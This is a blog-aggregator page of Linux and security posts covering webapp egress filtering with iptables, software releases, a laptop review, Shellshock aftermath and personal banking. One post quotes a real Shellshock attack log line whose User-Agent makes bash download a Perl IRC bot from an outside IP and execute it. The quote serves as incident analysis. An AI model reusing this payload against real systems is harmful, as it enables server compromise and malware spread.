Indeed, if you think of your app in the abstract, it has to have access to the network to serve responses to users, right? But what generally happens is that there is some division between the web server and the app itself. People who looked into Java in the early noughties have probably heard the term Application Server, usually in the form of Apache Tomcat or IBM WebSphere; essentially the same "actor" exists for Rails apps in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app that talk to the web server to receive user requests and serve back responses. This essentially means that for the basic web interaction, no network access is needed by the application service.

Things get a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly, even my blog needs to talk to some services, either to ping them to announce that a new post is out, or to check with Akismet whether blog comments are spam. WordPress thumbnail plugins, which have a poor security track record, are known to fetch external content to process, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites. So a fair amount of network connectivity is needed for web apps too, which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove network access from your webapp: SELinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can pull off the trick with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. What this allows you to do is match (and thus filter) connections based on the originating (or destination) user. This of course only works if you can isolate your webapps under separate users, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps into users is difficult (they run in-process with the webserver and negate the split with the application server), but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.
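A quick sketch of that prerequisite (the blog account name is a placeholder): give each webapp its own unprivileged system user, and double-check which accounts your application servers actually run as before writing any filtering rules.

useradd -r -s /sbin/nologin blog     # one dedicated, unprivileged account per webapp
ps -o user:16,comm -C php-fpm        # verify which users your pools really run under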

Now, depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers: my blog, a customer's WordPress blog, phpMyAdmin for that customer's database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements, so I'll start with the one whose requirements are lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. The requirements for phpMyAdmin are pretty similar: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, the network policy is quite obvious: deny any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT, and the same for the other user.
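Spelled out for both accounts, a minimal sketch looks like this; the user names are placeholders for whatever your application servers run as, and since the rules only match the external interface, loopback traffic to the local database is left alone:

iptables -A OUTPUT -o eth0 -m owner --uid-owner erp -j REJECT         # ERP only needs the local PostgreSQL
iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT  # phpMyAdmin only needs the local MySQL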

The situation for the other two apps is a bit more complex: my blog wants at least to announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly uses HTTP and HTTPS as well. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better: you can put a proxy on your localhost and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp never to connect directly to the web. Unfortunately that is not straightforward to implement, as neither Passenger nor php-fpm has a clean way to pass environment variables per user.
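For the transparent-proxy variant, the same owner match can be combined with a REDIRECT rule in the nat table. This is only a sketch, assuming a local proxy such as Squid listening on port 3128 and a dedicated blog user; HTTPS and DNS still need to be handled separately:

iptables -t nat -A OUTPUT -p tcp --dport 80 -m owner --uid-owner blog -j REDIRECT --to-ports 3128   # plain HTTP from the blog user is rerouted through the local proxy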

What I've done for now is hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still looking for a solution for PHP, unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it makes two main HTTP calls, one to Google Blog Search (which was shut down back in May) and one to Typo's version file (which is now a 404 page since the move to the Publify name). I'll soon be shutting both of them down since I really don't need them. Indeed, Publify development still seems to be heading toward "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect to go back to it any time soon.

sthttpd: a very tiny and very fast http server with a mature codebase!

by blueness via Anthony G. Basile »

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn't been updated in about 10 years and there were dozens of accumulated patches in the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was "done", whatever that meant, so I was going to tree-clean it.  I expressed my intentions on the upstream mailing list and got a bunch of "please don't!" from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patches.  I dubbed the fork sthttpd.  There was no particular meaning to the "s".  Maybe "still kicking"?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world-readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com> from OpenSUSE fixed a possible DoS triggered by a specially crafted .htpasswd. Bob Tennent added some code to send correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not really my thing, but its tiny size and speed make it perfect for embedded systems, which are near and dear to my heart.  I also make sure it compiles on *BSD and on Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.


New laptop Lenovo Thinkpad X1 Carbon 20A7

by Hanno Böck via Hanno's blog »

While I got along well with my Thinkpad T61 laptop, for quite some time I had been planning to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops, in its 2014 edition. The X1 Carbon was introduced in 2012; however, a completely new variant which is very different from the first one was released in early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems shops rarely keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard; however, having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys; instead it has what Lenovo calls an adaptive keyboard: a touch-sensitive strip which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting it display the normal F-keys works well, and not having "real" keys there doesn't feel like a big disadvantage. Besides that, Lenovo removed the Caps Lock key and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it used to be (small downside), but the </>/| key is where it belongs (big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to the ultrabook / integrated design, no easy replacement of battery, RAM or HD
* No SD card reader
* Some trouble getting used to the touchpad (however, there are lots of ways to configure it; I assume it'll get better as I play with it)

It used to be the case that people wrote docs on how to get all the hardware in a laptop running on Linux, which I did for my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernel and xorg packages and most things will be fine". However, I thought it would be nice to have a central place where I collect relevant information, so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

phpMyFAQ 2.8.15 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.15, the “Oops, we did it again!” release. This release fixes the broken installation introduced with phpMyFAQ 2.8.14 and updates the Farsi translation.

phpMyFAQ 2.8.14 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team is pleased to announce phpMyFAQ 2.8.14, the “Happy Birthday, Bianca!” release. This release fixes an installation compatibility issue with MySQL 5.1 and MySQL 5.5 introduced with phpMyFAQ 2.8.13. We also fixed some minor issues.

bsdtalk245 - Looking for a new /home

by Mr via bsdtalk »

Just a short update about the server that houses the podcast files.  University IT consolidation has created some unplanned changes, but I hope to have a new server spun up soon.  Also, curious to hear what all of you use for your home directory on the Internet.

File Info: 7Min, 3MB.

Ogg Link: https://archive.org/download/bsdtalk245/bsdtalk245.ogg

Smokeping under Debian with Master-Slave configuration

by ff via some useful things »

Since with my master-slave setup it kept happening that data for new probes did not show up, I am blogging the fix here for future reference.

Make sure that the Smokeping directory is writable for www-data.

root@orion:/var/lib# ls -la | grep smokeping
drwxrwxr-x  7 smokeping     www-data       4096 Sep 30 16:11 smokeping
Furthermore, make sure that the directories and the RRD files inside them have the correct permissions. When Smokeping creates new RRDs, they get the wrong permissions!

root@orion:/var/lib/smokeping# ll
total 28
drwxrwxr-x  7 smokeping www-data 4096 Sep 30 16:11 ./
drwxr-xr-x 70 root      root     4096 Sep 30 11:56 ../
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:19 Bandwidth/
drwxrwxr-x  2 smokeping www-data 4096 Aug 11 13:45 MultiHost/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 Other/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 S/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:20 __sortercache/
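A quick way to straighten the permissions out in one go; the path and the smokeping/www-data accounts match the layout shown above, so adjust them if yours differ:

chown -R smokeping:www-data /var/lib/smokeping
chmod -R g+w /var/lib/smokeping
find /var/lib/smokeping -type d -exec chmod g+s {} +   # newly created files keep the www-data group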
As soon as the permissions are correct, data starts showing up. As you can see below, there is a *.slave_cache file, since one of the slaves is currently sending data. The file is owned by the Apache user because the master-slave communication goes through the Smokeping CGI.

root@orion:/var/lib/smokeping/Bandwidth# ll
total 4076
drwxrwxr-x 2 smokeping www-data    4096 Sep 30 19:23 ./
drwxrwxr-x 7 smokeping www-data    4096 Sep 30 16:11 ../
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~home.rrd
-rw-r--r-- 1 www-data  www-data      78 Sep 30 19:23 Target.home.slave_cache
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:17 Target~sg.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~us.rrd
I hope this helps.


A little positivity goes a long way

by Zach via The Z-Issue »

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day: with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that's really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said "good morning." She responded with "what a beautiful smile! You make sure to give that gift to everyone today." I was really taken aback by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn't anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn't know each other at all, and yet we were able to carry on a short conversation, understand one another's humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a "thank you." All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

Return of the IPJ

by Karsten via Security-Planet.de »

The Internet Protocol Journal was one of the best publications in the networking sector, so I was quite disappointed when it was discontinued last year. It is all the more pleasing that the IPJ has been relaunched with new sponsors; my copy arrived in the mailbox over the weekend.
The new website does not yet say how the print edition can be subscribed to. The online version can, as before, be downloaded online.
The main topics of the current issue are

  • Gigabit Wi-Fi
  • A Question of DNS Protocols

PostgreSQL Ebuilds Unified

by titanofold via titanofold »

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)

Bye bye Feedburner

by ff via some useful things »

Since using Feedburner no longer gives me any added value, I have switched the feeds back to the original WordPress feeds. The address of the RSS feed is now: https://nodomain.cc/feed

Please update your feed readers!


Responsibility in running Internet infrastructure

by Hanno Böck via Hanno's blog »

If you have any interest in IT security you have probably heard of the vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software, it's inevitable that this will have some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run Internet infrastructure in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs, besides some scans that were done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: this was on Friday afternoon, 5 pm (CET). What's happening here is that someone is sending an HTTP request in which the user agent string, which usually contains the name of the software (e.g. the browser), is set to malicious code meant to exploit the Bash vulnerability. If successful, it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation, so this didn't do anything on our servers. The file jurat contains a Perl script, a piece of malware called IRCbot.a or Shellbot.B.
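As an aside, the widely circulated one-liner to check whether a given bash binary is still affected by the original bug looks like this; a patched bash prints only "this is a test", while a vulnerable one also prints "vulnerable":

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'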

For all such logs I checked whether the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP; it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat. I could chat with somebody who asked me if I was a customer. He told me that if I wanted to report abuse he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that was not possible. I wrote an email to their abuse department. Nothing happened.

At noon on Sunday the malware was still online. When I checked again late on Sunday evening it was gone.

Don't get me wrong: things like this happen. I run servers myself. You cannot protect your infrastructure from every imaginable threat. You can greatly reduce the risk, and we try hard to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is have reasonable crisis management.

When one of the servers under your responsibility is part of a large-scale attack based on a threat that's making headlines everywhere, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale on which you take action in such a situation is the difference between hundreds and millions of infected hosts. Having your hosts deploy malware for that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

What does #shellshock mean for Gentoo?

by Flameeyes via Flameeyes's Weblog »


Photo credit: Liam Quinn
This is going to be interesting, as Planet Gentoo is unavailable while I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid a repeat of this. And that's a difficult topic, because a 25-year-old bug is not easy to avoid, especially since there are probably plenty of siblings of it around that we have not found yet, just like this one last week. But there are things that we can do as a whole ecosystem to reduce the chances of problems like this happening, or at least keep them from escalating so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh on Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I pushed for this four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one thing I find very good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is only half solved; on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts avoid requiring bash or you're using systemd (as I do on the laptops), then it's mostly safe to switch to dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately, as I said, it's only mostly safe. I even found that some of the init scripts I wrote, and had checked with checkbashisms, did not work as intended with dash; fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage in the output; this breaks facter-2 but not facter-1, as I found out when it broke my Puppet setup.
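If you want to vet your own scripts before flipping /bin/sh, checkbashisms (originally from Debian's devscripts) does a reasonable first pass; a sketch, where -f forces it to also look at files it would otherwise skip:

checkbashisms -f /etc/init.d/*   # flags constructs that a plain POSIX sh such as dash will not accept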

Interestingly, it would be simpler for me to use zsh, as then both the init scripts and lsb_release would have worked. Unfortunately, when I tried doing that, Emacs tramp-mode froze when trying to open files, both with the sshx and sudo modes. The same was true for BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it has only one reference implementation, but because it also seems to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through Puppet to all my servers. It should be enough for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25-year-old bug is enough to make them think twice about all of them, so I'll keep my options open.

This is actually why I like software biodiversity: it gives you the option to select a different component when one of them fails, and that is what worries me the most about systemd right now. I also hope that showing how badly bash has fared all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a properly librarised implementation. But that's probably hoping for too much.

FreeBSD 10.1-BETA3 Available

by Webmaster Team via FreeBSD News Flash »

The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

A legal dispute with a ghost

by Jesco Freund via My Universe »

The update to the latest Ghost version, 0.5.2, holds a few pitfalls; my own installation guide does not cover some of the newly added difficulties, most of which stem from the fact that, in my case, the ghost has to do its job on FreeBSD.

The first hurdle was an endlessly long list of error messages thrown by an innocuous npm install --production. Although Ghost is configured here to use PostgreSQL, it now forces a build of the SQLite modules, whose dependencies were of course not installed; a supposedly easy problem to fix:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
That changed the shape of the error message but did not banish it. After some deeper digging through the error logs and various JSON and JavaScript files, I found that somewhere the path to the Python interpreter must have been hard-wired, so that the PYTHON environment variable never came into play and was simply ignored in this case.

The solution is quite simple; a symlink does the trick (even if not very elegantly):

cd /usr/local/bin  
ln -s python2 python  
After that, all the dependencies built without complaint, and Ghost could be started manually (via npm start or node index.js) without any trouble. But this is where the really fun part began, because Supervisor could not stop Ghost from immediately terminating itself again, which led to log entries as bizarre as these:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
So the Ghost process promptly exited again with exit status 0. Yes, you read that correctly: Ghost falls flat on its face but reports having terminated normally. And since Ghost started and worked fine from the command line, I naturally put the blame on supervisord; in vain, as I found out afterwards.

It was the unruly ghost that was (once again) disobeying its process supervisor. Lacking a clear cause for this behaviour, the only thing that helped here was analysing the log files (to a limited extent) and the source code. The stumbling block turned out to be the permissions in the content directory of the Ghost installation.

While the subdirectories data and images have always required write access for the ghost, apps and themes were a different matter; the latter in particular was read-only in my setup, since I wanted to give the still rather immature Ghost as little opportunity as possible to do persistent damage in the event of an exploitable security hole (such as smuggling malicious JavaScript into the theme).

Temporarily, Ghost's odd behaviour can be stopped by granting it the permissions it wants; but as with a stubborn child, giving in is perhaps not the best idea here. I have therefore opened a discussion thread in the Ghost forum, in the hope that in one of the next releases Ghost will quietly accept that it is not allowed to scribble all over the disk.
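For reference, the temporary workaround amounts to something like this; the install path and the ghost account are placeholders for whatever your setup uses:

chown -R ghost /usr/local/www/ghost/content/apps /usr/local/www/ghost/content/themes   # hypothetical path and user
chmod -R u+w /usr/local/www/ghost/content/apps /usr/local/www/ghost/content/themes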

Tor-ramdisk 20140925 released

by blueness via Anthony G. Basile »

I've been blogging about my non-Gentoo work using my drupal site at http://opensource.dyc.edu/ but since I may be losing that server sometime in the future, I'm going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn't exactly fall under the category of a "Gentoo Project."

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads


I finally have my first Irish credit card, here's why

by Flameeyes via Flameeyes's Weblog »


Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland I'm finally about to receive my first Irish credit card. This took longer than I was expecting, but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better to start from the top.

First of all, I already have credit cards, Italian ones which, as I wrote before, are not chip'n'pin, which causes a major headache in countries such as Ireland (and the UK too), where cards without chip'n'pin are not really well supported or understood. This means they are not viable, even though I have been using them for years and have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes: why do I need a credit card? The answer lies in the mess that is the Irish banking system: since there is no "good" bank over here, I've been using the same bank I signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if your balance never goes below €2.5k for the whole quarter. This is not the "usual" style I've seen from American banks, where they expect your average not to go below a certain amount and it doesn't matter if one day you have no money and the next you have €10k in the account: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card; for a while NFC payments were excluded, so I tried to use them more, but very few merchants allowed that, and the €15 limit on their use made it quite impractical to pay for most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are, on the other hand, free; there are sometimes charges for "overseas usage" (foreign transactions), and you are charged interest if you don't pay off the full debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year; a whole lot more than Italy, where it was €1.81 until they dropped it entirely. So my requirement for a credit card is essentially to hide these costs as much as possible. Which means that just getting a standard AIB card is not going to be very useful: yes, I would be saving money after the first 150 operations (150 × €.20 = €30), but I would save even more if I managed to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point for every €2 spent. Since each point gets you a €.01 discount at the end of the quarter, it's almost like cashback, as long as you buy your groceries from Tesco (which I do, because it's handy to have the delivery rather than having to go out for it, especially for things that are frozen or that weigh a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to earn back the stamp duty with the cashback alone (€750 × 12 × 0.5% = €45), and it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland and was rejected, as I did not have any credit history at all. I tried again earlier this year, this time with a raise at work behind me, and the result was positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that shows you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill. The problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more. The bank was the hardest to convince: for over a year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfers for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color-printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification; he stamped it, dated it and signed a declaration, but it was not okay. I brought it to An Post, the Irish postal service, told them that Tesco wanted a specific declaration on it, and showed them the letter they sent me; they refused and just stamped it. I then went to the Garda, the Irish police, and repeated Tesco's request; not only did they refuse to comply, but they told me that they are not allowed to do what Tesco was asking me to have them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, in the end, was to go to a bank branch (it didn't have to be the branch I'm enrolled with) and have them stamp the passport copy for me. Tesco didn't care that it was a different branch where nobody knew me; it was still my bank and they accepted it. Of course, since it took a few months to go through all these attempts, by the time they accepted my passport I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign, and I'm now just awaiting the actual plastic card.

But as I said, my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me: having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG, so I don't need a card to get the usual free upgrades when available. The good part about them, though, is that you can bless a second Platinum card, which gets the same advantages, to "friends or family"; in my case the target would have been my brother-in-law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards to friends and family, and in particular I wanted to have one sent to my mother, so that she has a way to pay for things and debit them to me so I can help her out. Of course, as I said, it has a cost, and a hefty one. On the other hand, it allows you one more trick: you can pay the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in a year to cover it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately, what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank takes on the onus of paying the first €15k of debt I would incur and would not be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis, but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders from other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which has a feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm now looking for a MasterCard I can get, to hedge my bets on the acceptance of the card – it turns out that Visa is not well received in the Netherlands and in Germany – and that can at least repay its own stamp duty.

Project health, and why it's important — part of the #shellshock afterwords

by Flameeyes via Flameeyes's Weblog »

Tech media has been in a frenzy this year, trying to hype everything out there as the end of the Internet of Things or the nail in the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason the security issues found were considered so nasty is that we know the affected software is widely used.

